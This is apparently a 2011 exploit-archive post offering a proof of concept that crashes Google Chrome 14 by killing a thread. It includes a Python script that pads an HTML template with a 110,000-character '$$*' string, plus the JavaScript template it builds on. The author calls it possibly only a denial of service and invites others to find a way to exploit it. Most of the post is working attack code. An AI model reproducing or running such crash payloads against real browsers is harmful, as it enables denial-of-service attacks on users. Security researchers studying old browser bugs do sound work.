## _(`-')_ pigtail23 (`-') (`-')_ _ www.remoteshell.de ##
## \-.(OO ) (_).-> ( OO).->(OO ).-/(_)<-.##
## _.'\ ,-(`-') ,---(`-')/'._/ ,---. ,-(`-'),--. ) .----..----.##
##(_...--'' | ( OO)'.-(OO )|'--...__)| \ /`.\| ( OO)|(`-')\_,-.|\_.-,| ##
##||_.' | ||)|| .-, \`--..--''-'|_.' | ||)||OO ) .' .'|_<##
##|.___.'(||_/ || '.(_/ ||(|.-.|(||_/(|'__ | .'/_ .-. \| ##
##||||'->|'-'||| || || ||'->| |'||\ `-'/ ##
##`--'`--'`-----' `--' `--' `--' `--' `-----' `------' `---''##
###################################################################################
###################################################################################

October 22, 2011

Ohh nice! What u doing google? Thx 4 ur bug! 0__o

Google Chrome PoC, killing thread.
Exploitable or only a DoS!? Found no way to exploit it. Good Luck!!!

Test system: WinXP SP3, Win7 (64 bit)
Google Chrome version: 14.0.835.202

Greetings to: mr_insecure, myownremote, noptrix, Eph, lnxg33k, CyberMaN,...
TheXero, Dexter, #back-track.de and #intern0t @ irc.freenode.net

###################################################################################
poc.html: too big!
################################################################################### Python script for debugging: #!/usr/bin/python filename = 'poc.html' content = open('template.html', 'r').read() buff = '$$*' * 36800 rc = 484 content2 = content[:rc] + buff + content[rc:] FILE = open(filename,"w") FILE.write(content2) FILE.close() ################################################################################### template.html: <html> <body> <script>(function(){var d=document;if(!("autofocus" in d.createElement("input"))){try{d.getElementById("yschsp").focus();}catch(e){}}data={"assist":{"url":"http:\/\/www.google.com","maxLength":38,"linkStem":"http:\/\/www.remoteshell.de","settingsUrl":"http:\/\/www.chrooome.xxx","strings":{"searchbox_title":"bam","settings_text":"bam","gossip_desc":"bam","scroll_up":"bam","scroll_down":"bam","aria_available_suggestions":"bam","aria_no_suggestion_available":"bam"}}};window.onload=function(){var h=d.getElementsByTagName("head")[0],o=d.createElement("script");o.src="http://www.0__o";h.appendChild(o);};}());</script> </body> </html>